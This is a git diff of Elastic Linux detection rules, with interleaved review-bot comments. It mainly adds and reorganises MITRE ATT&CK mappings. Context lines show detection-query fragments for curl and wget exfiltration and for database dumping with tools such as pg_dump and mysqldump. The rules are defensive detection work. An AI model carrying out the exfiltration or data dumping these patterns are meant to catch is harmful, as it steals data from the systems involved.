 [rule]
 author = ["Elastic"]
@@ -125,3 +125,39 @@ reference = "https://attack.mitre.org/techniques/T1059/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1222"
+name = "File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1222.002"
+name = "Linux and Mac File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/002/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml
index 52cc47e2b35..f71d3a5316e 100644
--- a/rules/linux/execution_tc_bpf_filter.toml
+++ b/rules/linux/execution_tc_bpf_filter.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/11"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -129,3 +129,21 @@ reference = "https://attack.mitre.org/techniques/T1059/004/"
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml
index 6c81fd12cc5..4db0ac23cdf 100644
--- a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml
+++ b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/13"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -109,11 +109,28 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
+[[rule.threat.technique]]
+id = "T1106"
+name = "Native API"
+reference = "https://attack.mitre.org/techniques/T1106/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1620"
+name = "Reflective Code Loading"
+reference = "https://attack.mitre.org/techniques/T1620/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name"]
diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml
index fb453b1a848..cfcd4c91f4b 100644
--- a/rules/linux/execution_unusual_kthreadd_execution.toml
+++ b/rules/linux/execution_unusual_kthreadd_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/30"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/10/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -117,21 +117,43 @@ process.command_line:(
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Execution"
- id = "TA0002"
- reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
- [[rule.threat.technique]]
- id = "T1059"
- name = "Command and Scripting Interpreter"
- reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
- [[rule.threat.technique.subtechnique]]
- name = "Unix Shell"
- id = "T1059.004"
- reference = "https://attack.mitre.org/techniques/T1059/004/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1014"
+name = "Rootkit"
+reference = "https://attack.mitre.org/techniques/T1014/"
+
+[[rule.threat.technique]]
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1036.009"
+name = "Break Process Trees"
+reference = "https://attack.mitre.org/techniques/T1036/009/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name", "host.id"]
diff --git a/rules/linux/execution_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml
index 7c4599b99b1..254cf9a3902 100644
--- a/rules/linux/execution_unusual_path_invocation_from_command_line.toml
+++ b/rules/linux/execution_unusual_path_invocation_from_command_line.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -135,11 +135,20 @@ id = "T1564"
 name = "Hide Artifacts"
 reference = "https://attack.mitre.org/techniques/T1564/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1574.007"
+name = "Path Interception by PATH Environment Variable"
+reference = "https://attack.mitre.org/techniques/T1574/007/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name"]
diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml
index 0b613bb5b67..fb8c1cd5886 100644
--- a/rules/linux/execution_unusual_pkexec_execution.toml
+++ b/rules/linux/execution_unusual_pkexec_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -129,6 +129,11 @@ id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
@@ -147,6 +152,23 @@ id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1548.001"
+name = "Setuid and Setgid"
+reference = "https://attack.mitre.org/techniques/T1548/001/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.command_line"]
diff --git a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml
index d26ede83d7b..af05ed7556d 100644
--- a/rules/linux/exfiltration_potential_curl_data_exfiltration.toml
+++ b/rules/linux/exfiltration_potential_curl_data_exfiltration.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/29"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/13"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -113,12 +113,22 @@ process.name == "curl" and ?process.parent.executable != null and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Exfiltration"
- id = "TA0010"
- reference = "https://attack.mitre.org/tactics/TA0010/"
-
- [[rule.threat.technique]]
- name = "Exfiltration Over Alternative Protocol"
- id = "T1048"
- reference = "https://attack.mitre.org/techniques/T1048/"
+[[rule.threat.technique]]
+id = "T1048"
+name = "Exfiltration Over Alternative Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1048.001"
+name = "Exfiltration Over Symmetric Encrypted Non-C2 Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1048.003"
+name = "Exfiltration Over Unencrypted Non-C2 Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/003/"
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
diff --git a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml
index 89aa348f4dd..091686f3033 100644
--- a/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml
+++ b/rules/linux/exfiltration_potential_data_splitting_for_exfiltration.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -124,6 +124,11 @@ process where host.os.type == "linux" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1030"
+name = "Data Transfer Size Limits"
+reference = "https://attack.mitre.org/techniques/T1030/"
+
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
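Review bot: The curl rule's new sub-techniques are T1048.001 (symmetric encrypted non-C2 protocol) and T1048.003 (unencrypted non-C2 protocol), while ATT&CK places TLS-based transfers such as HTTPS under T1048.002 (asymmetric encrypted non-C2 protocol). If the query this rule runs, which is outside the hunk, also matches https:// or other TLS destinations, a `[[rule.threat.technique.subtechnique]]` block for `T1048.002` would be the closer mapping, either in place of .001 or alongside it. This is a mapping question to confirm against the query rather than a defect in the TOML itself.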
diff --git a/rules/linux/exfiltration_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml
index 6f00692824d..579db8edbdb 100644
--- a/rules/linux/exfiltration_potential_database_dumping.toml
+++ b/rules/linux/exfiltration_potential_database_dumping.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/13"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -104,12 +104,30 @@ process.name in ("pg_dump", "pg_dumpall", "mysqldump", "mariadb-dump", "mongodum
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Exfiltration"
- id = "TA0010"
- reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat.technique]]
+id = "T1048"
+name = "Exfiltration Over Alternative Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/"
- [[rule.threat.technique]]
- name = "Exfiltration Over Alternative Protocol"
- id = "T1048"
- reference = "https://attack.mitre.org/techniques/T1048/"
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1119"
+name = "Automated Collection"
+reference = "https://attack.mitre.org/techniques/T1119/"
+
+[[rule.threat.technique]]
+id = "T1213"
+name = "Data from Information Repositories"
+reference = "https://attack.mitre.org/techniques/T1213/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml
index e0f16b19169..30d03cd7881 100644
--- a/rules/linux/exfiltration_potential_wget_data_exfiltration.toml
+++ b/rules/linux/exfiltration_potential_wget_data_exfiltration.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/07"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/13"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -122,12 +122,25 @@ process.name == "wget" and ?process.parent.executable != null and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Exfiltration"
- id = "TA0010"
- reference = "https://attack.mitre.org/tactics/TA0010/"
+[[rule.threat.technique]]
+id = "T1048"
+name = "Exfiltration Over Alternative Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/"
- [[rule.threat.technique]]
- name = "Exfiltration Over Alternative Protocol"
- id = "T1048"
- reference = "https://attack.mitre.org/techniques/T1048/"
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml
index f6d821c4711..51dce3af626 100644
--- a/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml
+++ b/rules/linux/exfiltration_unusual_file_transfer_utility_launched.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -171,6 +171,11 @@ from logs-endpoint.events.process-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1048"
+name = "Exfiltration Over Alternative Protocol"
+reference = "https://attack.mitre.org/techniques/T1048/"
+
 [rule.threat.tactic]
 id = "TA0010"
 name = "Exfiltration"
@@ -179,6 +184,16 @@ reference = "https://attack.mitre.org/tactics/TA0010/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/linux/impact_data_encrypted_via_openssl.toml b/rules/linux/impact_data_encrypted_via_openssl.toml
index d5ae1fbcb95..f7bf7c915b7 100644
--- a/rules/linux/impact_data_encrypted_via_openssl.toml
+++ b/rules/linux/impact_data_encrypted_via_openssl.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/26"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -115,3 +115,16 @@ reference = "https://attack.mitre.org/techniques/T1486/"
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/impact_memory_swap_modification.toml b/rules/linux/impact_memory_swap_modification.toml
index 2336a398314..c1231cd493c 100644
--- a/rules/linux/impact_memory_swap_modification.toml
+++ b/rules/linux/impact_memory_swap_modification.toml
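Review bot: `impact_data_encrypted_via_openssl.toml` gains a T1059 technique with no sub-technique, whereas the hunk just above it for `exfiltration_unusual_file_transfer_utility_launched.toml` pairs T1059 with a `T1059.004` `Unix Shell` sub-technique block, and nearly every other T1059 addition in this patch does the same. If the openssl rule's query keys on a shell parent or a shell-launched process, adding the same `[[rule.threat.technique.subtechnique]]` entry for `T1059.004` would keep the Execution mapping consistent across the Linux rules. The query is outside the hunk, so the choice should be checked against it rather than applied blindly.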
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -121,6 +121,11 @@ id = "T1496"
 name = "Resource Hijacking"
 reference = "https://attack.mitre.org/techniques/T1496/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1496.001"
+name = "Compute Hijacking"
+reference = "https://attack.mitre.org/techniques/T1496/001/"
+
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
diff --git a/rules/linux/impact_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml
index 93c5361d32a..5ce3b6d80a5 100644
--- a/rules/linux/impact_potential_bruteforce_malware_infection.toml
+++ b/rules/linux/impact_potential_bruteforce_malware_infection.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -205,3 +205,16 @@ reference = "https://attack.mitre.org/techniques/T1071/"
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1110"
+name = "Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/impact_process_kill_threshold.toml b/rules/linux/impact_process_kill_threshold.toml
index 85ce3461abd..a1f4454d1ea 100644
--- a/rules/linux/impact_process_kill_threshold.toml
+++ b/rules/linux/impact_process_kill_threshold.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/27"
 integration = ["endpoint", "auditd_manager", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -107,6 +107,23 @@ id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
 [rule.threshold]
 field = ["host.id", "process.executable", "user.name"]
 value = 15
diff --git a/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml b/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml
index 45f5c1a911f..89e8ba1f7b8 100644
--- a/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml
+++ b/rules/linux/initial_access_apache_struts_cve_2023_50164_exploitation_to_webshell.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/19"
 integration = ["endpoint", "network_traffic"]
 maturity = "production"
-updated_date = "2025/11/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
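Review bot: The appended Defense Evasion block in impact_process_kill_threshold.toml runs straight into the next table: the added `reference = "https://attack.mitre.org/tactics/TA0005/"` line is immediately followed by the unchanged `[rule.threshold]` line with no separating blank, whereas every other new table in this patch is set off by a blank line. Add an empty added line after the new tactic's `reference` so the file matches the formatting the rest of the patch produces. The same missing blank occurs where a new `[rule.threat.tactic]` precedes `[rule.new_terms]` in initial_access_first_time_public_key_authentication.toml, initial_access_successful_ssh_authentication_by_unusual_ip.toml, initial_access_successful_ssh_authentication_by_unusual_user.toml, lateral_movement_remote_file_creation_world_writeable_dir.toml, lateral_movement_unusual_remote_file_creation.toml and persistence_dpkg_package_installation_from_unusual_parent.toml.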
@@ -114,31 +114,44 @@ sequence by agent.id with maxspan=10s
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
 
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1505"
 name = "Server Software Component"
 reference = "https://attack.mitre.org/techniques/T1505/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1505.003"
 name = "Web Shell"
 reference = "https://attack.mitre.org/techniques/T1505/003/"
 
-
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
diff --git a/rules/linux/initial_access_first_time_public_key_authentication.toml b/rules/linux/initial_access_first_time_public_key_authentication.toml
index 1e74cf2cb47..4e1a8689f7f 100644
--- a/rules/linux/initial_access_first_time_public_key_authentication.toml
+++ b/rules/linux/initial_access_first_time_public_key_authentication.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -99,16 +99,38 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
 
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["system.auth.ssh.signature"]
diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml
index d1e0215d442..f571a929dd7 100644
--- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml
+++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_ip.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -92,16 +92,33 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
 
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["related.ip"]
diff --git a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml
index ffc5417fe60..098cdd42503 100644
--- a/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml
+++ b/rules/linux/initial_access_successful_ssh_authentication_by_unusual_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["system"]
 maturity = "production"
-updated_date = "2025/12/19"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -76,16 +76,38 @@ event.category:authentication and host.os.type:linux and event.action:ssh_login
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+
+[[rule.threat.technique]]
+id = "T1133"
+name = "External Remote Services"
+reference = "https://attack.mitre.org/techniques/T1133/"
+
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
 
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["related.user"]
diff --git a/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml b/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml
index 3ebcdec8cc2..6d17eb3c5b4 100644
--- a/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml
+++ b/rules/linux/initial_access_telnet_auth_bypass_envar_auditd.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/26"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2026/02/24"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
@@ -93,26 +93,39 @@ sequence by host.id with maxspan=1s
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1190"
 name = "Exploit Public-Facing Application"
 reference = "https://attack.mitre.org/techniques/T1190/"
 
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1210"
 name = "Exploitation of Remote Services"
 reference = "https://attack.mitre.org/techniques/T1210/"
 
-
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
 
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1068"
+name = "Exploitation for Privilege Escalation"
+reference = "https://attack.mitre.org/techniques/T1068/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml
index 159ac1545b7..b0118148c35 100644
--- a/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml
+++ b/rules/linux/initial_access_telnet_auth_bypass_via_user_envar.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/24"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/02/24"
+updated_date = "2026/03/24"
 
 [rule]
 author = ["Elastic"]
